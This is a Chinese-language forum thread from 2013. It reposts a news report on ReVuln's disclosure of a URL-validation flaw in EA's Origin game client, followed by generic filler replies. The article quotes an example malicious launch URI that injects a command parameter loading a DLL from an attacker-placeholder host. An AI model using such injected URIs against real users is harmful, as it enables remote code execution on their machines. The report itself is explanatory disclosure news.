SAY討論區

標題: EA又中槍：Origin平臺被曝安全漏洞 [打印本頁]

作者: yellow_dog 時間: 2013-3-19 12:21:26 標題: EA又中槍：Origin平臺被曝安全漏洞

名為ReVuln的計算機安全公司曾在去年曝光瞭Steam平臺存在URL地址訪問安全漏洞，現在該公司再次在阿姆斯特丹召開的Black Hat安全會議上指出EA的Origin平臺同樣具有類似的問題。

ReVuln公司的研究人員表示，在經過多次測試之後證明，Origin平臺的URL驗證機制存在漏洞，黑客可以利用這一漏洞推送假冒URL鏈接來向玩家計算機中安裝惡意程序。

通常來說，玩家在試圖通過Origin啟動遊戲時，客戶端會先向服務器請求一個用來啟動遊戲的URL地址，比如：origin://LaunchGame/[GameID]，而如果該地址被黑客攔截並替換成包含有不良內容的加鏈接，比如：origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll，那麼一旦當玩家執行啟動遊戲操作時便會導致自己的計算機遭遇安全風險。

不過，研究人員也表示，雖然Origin平臺自身具有這樣的安全機制缺陷，但黑客想要通過這種方式對用戶發起攻擊也並非易於反掌，因為目前大多瀏覽器產品都具有非法URL過濾攔截功能，所以為瞭確保計算機的安全，用戶一定要保證打開相關的瀏覽器安全功能，並且安裝有最新版的防病毒軟件，同時拒絕訪問那些不熟悉的URL地址。

[文章糾錯]

附件: [vi3ad0dse4s15.jpg] vi3ad0dse4s15.jpg (2013-3-19 12:21:26, 0 Bytes) / 下載次數 0
http://say.go2tutor.com/forum.php?mod=attachment&aid=Mjg5MDE0fGJkZjQ0YzcwfDE3ODA3MDU4MjJ8MHww

作者: tissss 時間: 2013-3-19 13:06:18

快站沙發，不知道有沒有成功

作者: Some1 時間: 2013-3-19 13:24:00

貌似看過了

作者: Some1 時間: 2013-3-19 13:26:16

好帖子，要頂！

作者: michael.huang 時間: 2013-3-19 13:30:15

我的媽呀，愛死你了

作者: Some1 時間: 2013-3-19 13:45:36

先看看怎麼樣！

作者: frankyhui 時間: 2013-3-19 21:15:54

你你你你呵呵~~~~別這樣哦...

作者: 牙`蔚 時間: 2013-3-19 23:21:03

一樓的位置好啊.

作者: 小妖怪 時間: 2013-3-20 01:44:59

看了你的帖，讓我有一種說不出的感覺

作者: maverickhon 時間: 2013-3-20 03:05:56

也許似乎大概是，然而未必不見得。

作者: stk190 時間: 2013-3-20 04:06:07

哎怎麼說那~~

作者: tamyc002 時間: 2013-3-20 05:06:15

想都不想，就支持一下

作者: nh88 時間: 2013-3-20 05:54:56

先占個位置，記錄這個好帖子

作者: 牙`蔚 時間: 2013-3-20 06:46:25

聲明一下：本人看貼和回貼的規則，好貼必看，精華貼必回。

作者: 前程 時間: 2013-3-20 07:38:38

佩服佩服啊.

作者: 傻QQ 時間: 2013-3-23 07:00:42

貌似看過了

作者: Derek_Me 時間: 2013-3-23 17:50:49

給你打氣加油，謝謝分享

作者: vol1210 時間: 2013-3-24 06:01:25

幫你頂，人還是厚道點好

作者: tn52003 時間: 2013-3-25 05:47:37

很好！很強大！

歡迎光臨 SAY討論區 (http://say.go2tutor.com/)